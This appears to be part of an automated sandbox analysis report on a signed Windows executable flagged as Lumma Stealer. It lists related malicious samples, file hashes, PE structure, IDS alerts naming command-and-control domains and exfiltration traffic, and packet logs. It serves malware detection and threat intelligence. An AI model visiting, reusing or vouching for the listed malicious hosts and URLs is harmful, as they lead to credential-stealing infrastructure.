                                                                                                                                                                                                              DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              Setup.exe (1).zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 209.222.21.115
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 149.248.45.75
                                                                                                                                                                                                              AKAMAI-ASN1EUYF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 23.218.93.195
                                                                                                                                                                                                              mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                              • 23.43.121.120
                                                                                                                                                                                                              https://adobe.blob.core.windows.net/adobe/adobe.html?sp=r&st=2024-12-17T20:58:07Z&se=2025-01-11T04:58:07Z&spr=https&sv=2022-11-02&sr=b&sig=vDeHaevGyq9deO2tRq9D03JLZreACGon6EF%2FhhJQk7s%3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.116.245.16
                                                                                                                                                                                                              https://walli.shanga.co/image/view/?id=1375Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 172.232.25.148
                                                                                                                                                                                                              jew.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 172.235.101.204
                                                                                                                                                                                                              https://garfieldthecat.tech/Receipt.htmlGet hashmaliciousWinSearchAbuseBrowse
                                                                                                                                                                                                              • 23.195.39.65
                                                                                                                                                                                                              Documento_Contrato_Seguro_44600862.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                                              • 2.22.50.131
                                                                                                                                                                                                              https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9jSUEudm9taXZvci5ydS9Td1dIay8=/%23dGVzbGFAdGVzbGEuY29tGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 184.85.177.135
                                                                                                                                                                                                              htkeUc1zJ0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 172.232.31.180
                                                                                                                                                                                                              CLOUDFLARENETUSYF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.16.123.96
                                                                                                                                                                                                              RFQ December-January Forcast and TCL.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                                                              sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.16.124.96
                                                                                                                                                                                                              http://efaktura.dhlecommerce.plGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.18.86.42
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                              • 104.21.23.76
                                                                                                                                                                                                              https://t.ly/2PGC5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.20.7.133

                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Poverty Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              • 45.77.249.79
                                                                                                                                                                                                              MeP66xi1AM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                              • 178.62.201.34
                                                                                                                                                                                                              • 45.77.249.79

                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                              No context

                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                              No created / dropped files found

                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                              General

                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                              Entropy (8bit):6.350733016938632
                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                              File name:ardware-v1.exe
                                                                                                                                                                                                              File size:3'487'960 bytes
                                                                                                                                                                                                              MD5:c491ddba2ee7516cfc5d5b57ece509a2
                                                                                                                                                                                                              SHA1:c0d068660dd74e890bf653a5c839e32314f6bca3
                                                                                                                                                                                                              SHA256:1a0b974102462f42d51ae78898fa59bcb9e399c9c3207d26ce0a503a1262f1e6
                                                                                                                                                                                                              SHA512:e7cafad543df242d76230c678d6beb9c8a00db2c8ede995cfe459bea3f996b3395db55736f203d5e22e5ad72fe72c8737d251ffcd3cd166c2e91b65a1a5484f1
                                                                                                                                                                                                              SSDEEP:98304:832g6KeR8WvRXOE4yPaKDZ4UmyYl3RbB9p6pkYiXe6/hDDV1h2Yq0W/cVA:7lKeRDRXiOZ4U9E3hrU6YiXjDp2iA
                                                                                                                                                                                                              TLSH:70F58E3C414ACE8DE74BE169228717CF38ED60B6C54FB58393C8E898ED5398C98AC557
                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........KY6.*7e.*7e.*7e.R4d.*7e.R2dL*7e.R3d.*7e..4d.*7e..3d.*7e..2d.*7e.R6d.*7e.*6e.*7eZ.?d.*7eZ..e.*7eZ.5d.*7eRich.*7e........PE..L..

                                                                                                                                                                                                              File Icon

                                                                                                                                                                                                              Icon Hash:5f796dd6ccd96926

                                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Entrypoint:0x6e4200
                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                              Time Stamp:0x67600960 [Mon Dec 16 11:05:04 2024 UTC]
                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                              Import Hash:5b1cbf5ac6f122fc95a4de1a12dcfae0

                                                                                                                                                                                                              Authenticode Signature

                                                                                                                                                                                                              Signature Valid:true
                                                                                                                                                                                                              Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                              Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                              Error Number:0
                                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                                              • 22/10/2024 20:00:00 23/10/2025 19:59:59
                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                              • CN=\u8881\u5dde\u533a\u521b\u65b0\u63a2\u7d22\u7f51\u7edc\u5de5\u4f5c\u5ba4\uff08\u4e2a\u4f53\u5de5\u5546\u6237\uff09, O=\u8881\u5dde\u533a\u521b\u65b0\u63a2\u7d22\u7f51\u7edc\u5de5\u4f5c\u5ba4\uff08\u4e2a\u4f53\u5de5\u5546\u6237\uff09, S=\u6c5f\u897f\u7701, C=CN, OID.2.5.4.15=Business Entity, OID.1.3.6.1.4.1.311.60.2.1.3=CN, SERIALNUMBER=92360902MADYXP3F14
                                                                                                                                                                                                              Version:3
                                                                                                                                                                                                              Thumbprint MD5:03E83BDACA900DD003355CC8E662D9FA
                                                                                                                                                                                                              Thumbprint SHA-1:CBF33B2C384509341A4D74C25B332DF2DF82B494
                                                                                                                                                                                                              Thumbprint SHA-256:522EC7DC5080E18BE2C2BDFEF1594B4167CD57D620ADEA28FF407784A49A3497
                                                                                                                                                                                                              Serial:334A8DC7BE701421BB5A00FEFCB26F50

                                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                              call 00007FCC98BB5DCDh
                                                                                                                                                                                                              pop ebp
                                                                                                                                                                                                              ret
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                              push 00000000h
                                                                                                                                                                                                              call dword ptr [0071400Ch]
                                                                                                                                                                                                              mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                              push eax
                                                                                                                                                                                                              call dword ptr [00714008h]
                                                                                                                                                                                                              push C0000409h
                                                                                                                                                                                                              call dword ptr [00714010h]
                                                                                                                                                                                                              push eax
                                                                                                                                                                                                              call dword ptr [00714014h]
                                                                                                                                                                                                              nop
                                                                                                                                                                                                              pop ebp
                                                                                                                                                                                                              ret
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              int3
                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                              sub esp, 00000324h
                                                                                                                                                                                                              push 00000017h
                                                                                                                                                                                                              call dword ptr [00714018h]
                                                                                                                                                                                                              test eax, eax
                                                                                                                                                                                                              je 00007FCC98BB60C9h
                                                                                                                                                                                                              mov ecx, 00000002h
                                                                                                                                                                                                              int 29h
                                                                                                                                                                                                              mov dword ptr [00723AD0h], eax
                                                                                                                                                                                                              mov dword ptr [00723ACCh], ecx
                                                                                                                                                                                                              mov dword ptr [00723AC8h], edx
                                                                                                                                                                                                              mov dword ptr [00723AC4h], ebx
                                                                                                                                                                                                              mov dword ptr [00723AC0h], esi
                                                                                                                                                                                                              mov dword ptr [00723ABCh], edi
                                                                                                                                                                                                              mov word ptr [00723AE8h], ss
                                                                                                                                                                                                              mov word ptr [00723ADCh], cs
                                                                                                                                                                                                              mov word ptr [00723AB8h], ds
                                                                                                                                                                                                              mov word ptr [00723AB4h], es
                                                                                                                                                                                                              mov word ptr [00723AB0h], fs
                                                                                                                                                                                                              mov word ptr [00723AACh], gs
                                                                                                                                                                                                              pushfd
                                                                                                                                                                                                              pop dword ptr [00723AE0h]
                                                                                                                                                                                                              mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                              mov dword ptr [00723AD4h], eax
                                                                                                                                                                                                              mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                              mov dword ptr [00723AD8h], eax
                                                                                                                                                                                                              lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                              mov dword ptr [00723AE4h], eax

                                                                                                                                                                                                              Data Directories

                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x32238c0x28.rdata
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3250000xeb55.rsrc
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x34ee000x4ad8
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x3340000x1e1c4.reloc
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x3216e00x54.rdata
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3216200x40.rdata
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x3140000x118.rdata
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                              Sections

                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                              .text0x10000x31265a0x31280078205e5871918b833f6f9ddbca7a51e6unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .rdata0x3140000xe9d80xea005168e2efcb56f21388167389be17cb99False0.3250868055555556data4.593908806113169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .data0x3230000x1b800xa00ac347fa16904e0c00d845293aa065859False0.21328125data2.5718746421367604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                              .rsrc0x3250000xeb550xec00aa6b34ce96afaf2bbbcc9abeddfe13b7False0.8014929819915254data6.91975740920949IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                              .reloc0x3340000x1e1c40x1e200fa9cecbf249aa3bf5c0b36b41962e84aFalse0.7237827411825726data6.844856432656225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                              Resources

                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                              RT_ICON0x3256280x9ae0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9888771186440678
                                                                                                                                                                                                              RT_MENU0x32f1080x29cdata0.5703592814371258
                                                                                                                                                                                                              RT_DIALOG0x32f3a40x344data0.5418660287081339
                                                                                                                                                                                                              RT_DIALOG0x32f6e80x2a0data0.5580357142857143
                                                                                                                                                                                                              RT_DIALOG0x32f9880x368data0.5263761467889908
                                                                                                                                                                                                              RT_DIALOG0x32fcf00x3c4data0.5072614107883817
                                                                                                                                                                                                              RT_DIALOG0x3300b40x4fcdata0.5047021943573667
                                                                                                                                                                                                              RT_DIALOG0x3305b00x35cdata0.5395348837209303
                                                                                                                                                                                                              RT_DIALOG0x33090c0x2d0data0.55
                                                                                                                                                                                                              RT_DIALOG0x330bdc0x31cdata0.5527638190954773
                                                                                                                                                                                                              RT_DIALOG0x330ef80x2e0data0.5679347826086957
                                                                                                                                                                                                              RT_DIALOG0x3311d80x4d4data0.4919093851132686
                                                                                                                                                                                                              RT_DIALOG0x3316ac0x308data0.5476804123711341
                                                                                                                                                                                                              RT_DIALOG0x3319b40x3fcdata0.538235294117647
                                                                                                                                                                                                              RT_STRING0x331db00x3cdata0.65
                                                                                                                                                                                                              RT_STRING0x331dec0x180data0.5911458333333334
                                                                                                                                                                                                              RT_STRING0x331f6c0x190data0.6025
                                                                                                                                                                                                              RT_STRING0x3320fc0x178data0.6090425531914894
                                                                                                                                                                                                              RT_STRING0x3322740x170data0.6195652173913043
                                                                                                                                                                                                              RT_STRING0x3323e40x190data0.605
                                                                                                                                                                                                              RT_STRING0x3325740x188data0.6071428571428571
                                                                                                                                                                                                              RT_STRING0x3326fc0x1a8data0.5943396226415094
                                                                                                                                                                                                              RT_STRING0x3328a40x190AmigaOS bitmap font "a", fc_YSize 25088, 22784 elements, 2nd "t", 3rd0.595
                                                                                                                                                                                                              RT_STRING0x332a340xbcdata0.6595744680851063
                                                                                                                                                                                                              RT_MESSAGETABLE0x332af00x498Matlab v4 mat-file (little endian) I, rows 55, columns 57, imaginary0.4923469387755102
                                                                                                                                                                                                              RT_MESSAGETABLE0x332f880x550Matlab v4 mat-file (little endian) I, rows 54, columns 57, imaginary0.4838235294117647
                                                                                                                                                                                                              RT_MESSAGETABLE0x3334d80x4ecMatlab v4 mat-file (little endian) \211, rows 116, columns 121, imaginary0.4936507936507937
                                                                                                                                                                                                              RT_GROUP_ICON0x3339c40x14data1.1
                                                                                                                                                                                                              RT_MANIFEST0x3339d80x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727

                                                                                                                                                                                                              Imports

                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                              KERNEL32.dllVirtualProtect, CloseHandle, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, LCMapStringW, GetProcessHeap, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, WriteConsoleW, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, DecodePointer, CreateFileW

                                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                              2024-12-18T09:58:34.461277+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.8527951.1.1.153UDP
                                                                                                                                                                                                              2024-12-18T09:58:35.448316+01002058222ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (immureprech .biz)1192.168.2.8527951.1.1.153UDP
                                                                                                                                                                                                              2024-12-18T09:58:37.556615+01002058223ET MALWARE Observed Win32/Lumma Stealer Related Domain (immureprech .biz in TLS SNI)1192.168.2.849712178.62.201.34443TCP
                                                                                                                                                                                                              2024-12-18T09:58:37.556615+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849712178.62.201.34443TCP
                                                                                                                                                                                                              2024-12-18T09:58:37.558557+01002822521ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)1178.62.201.34443192.168.2.849712TCP
                                                                                                                                                                                                              2024-12-18T09:58:38.131521+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849712178.62.201.34443TCP
                                                                                                                                                                                                              2024-12-18T09:58:38.131521+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849712178.62.201.34443TCP
                                                                                                                                                                                                              2024-12-18T09:58:38.138129+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.8545761.1.1.153UDP
                                                                                                                                                                                                              2024-12-18T09:58:39.135253+01002058214ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (deafeninggeh .biz)1192.168.2.8545761.1.1.153UDP
                                                                                                                                                                                                              2024-12-18T09:58:41.328110+01002058215ET MALWARE Observed Win32/Lumma Stealer Related Domain (deafeninggeh .biz in TLS SNI)1192.168.2.84971345.77.249.79443TCP
                                                                                                                                                                                                              2024-12-18T09:58:41.328110+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.84971345.77.249.79443TCP
                                                                                                                                                                                                              2024-12-18T09:58:41.432096+01002822521ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)145.77.249.79443192.168.2.849713TCP
                                                                                                                                                                                                              2024-12-18T09:58:42.516776+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.84971345.77.249.79443TCP
                                                                                                                                                                                                              2024-12-18T09:58:42.516776+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.84971345.77.249.79443TCP
                                                                                                                                                                                                              2024-12-18T09:58:42.536331+01002058220ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (effecterectz .xyz)1192.168.2.8653251.1.1.153UDP
                                                                                                                                                                                                              2024-12-18T09:58:42.847703+01002058218ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (diffuculttan .xyz)1192.168.2.8529221.1.1.153UDP
                                                                                                                                                                                                              2024-12-18T09:58:43.075720+01002058216ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (debonairnukk .xyz)1192.168.2.8585571.1.1.153UDP
                                                                                                                                                                                                              2024-12-18T09:58:43.381328+01002058236ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wrathful-jammy .cyou)1192.168.2.8562841.1.1.153UDP
                                                                                                                                                                                                              2024-12-18T09:58:43.610498+01002058210ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (awake-weaves .cyou)1192.168.2.8582991.1.1.153UDP
                                                                                                                                                                                                              2024-12-18T09:58:43.846754+01002058226ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sordid-snaked .cyou)1192.168.2.8592961.1.1.153UDP
                                                                                                                                                                                                              2024-12-18T09:58:45.603019+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.84971423.55.153.106443TCP
                                                                                                                                                                                                              2024-12-18T09:58:46.363652+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.84971423.55.153.106443TCP
                                                                                                                                                                                                              2024-12-18T09:58:47.956560+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849715104.21.66.86443TCP
                                                                                                                                                                                                              2024-12-18T09:58:49.061153+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849715104.21.66.86443TCP
                                                                                                                                                                                                              2024-12-18T09:58:49.061153+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849715104.21.66.86443TCP
                                                                                                                                                                                                              2024-12-18T09:58:50.485048+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849716104.21.66.86443TCP
                                                                                                                                                                                                              2024-12-18T09:58:51.308205+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849716104.21.66.86443TCP
                                                                                                                                                                                                              2024-12-18T09:58:51.308205+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849716104.21.66.86443TCP
                                                                                                                                                                                                              2024-12-18T09:58:53.515162+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849717104.21.66.86443TCP
                                                                                                                                                                                                              2024-12-18T09:58:55.867927+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849718104.21.66.86443TCP
                                                                                                                                                                                                              2024-12-18T09:58:57.737935+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849718104.21.66.86443TCP
                                                                                                                                                                                                              2024-12-18T09:58:59.279633+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849719104.21.66.86443TCP
                                                                                                                                                                                                              2024-12-18T09:59:02.733201+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849720104.21.66.86443TCP
                                                                                                                                                                                                              2024-12-18T09:59:05.287293+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849721104.21.66.86443TCP
                                                                                                                                                                                                              2024-12-18T09:59:09.101015+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849722104.21.66.86443TCP
                                                                                                                                                                                                              2024-12-18T09:59:09.910836+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849722104.21.66.86443TCP

                                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                              Dec 18, 2024 09:58:36.079425097 CET49712443192.168.2.8178.62.201.34
                                                                                                                                                                                                              Dec 18, 2024 09:58:36.079515934 CET44349712178.62.201.34192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:36.079693079 CET49712443192.168.2.8178.62.201.34
                                                                                                                                                                                                              Dec 18, 2024 09:58:36.113697052 CET49712443192.168.2.8178.62.201.34
                                                                                                                                                                                                              Dec 18, 2024 09:58:36.113730907 CET44349712178.62.201.34192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:37.556263924 CET44349712178.62.201.34192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:37.556615114 CET49712443192.168.2.8178.62.201.34
                                                                                                                                                                                                              Dec 18, 2024 09:58:37.558532953 CET49712443192.168.2.8178.62.201.34
                                                                                                                                                                                                              Dec 18, 2024 09:58:37.558557034 CET44349712178.62.201.34192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:37.558795929 CET44349712178.62.201.34192.168.2.8
                                                                                                                                                                                                              Dec 18, 2024 09:58:37.602605104 CET49712443192.168.2.8178.62.201.34
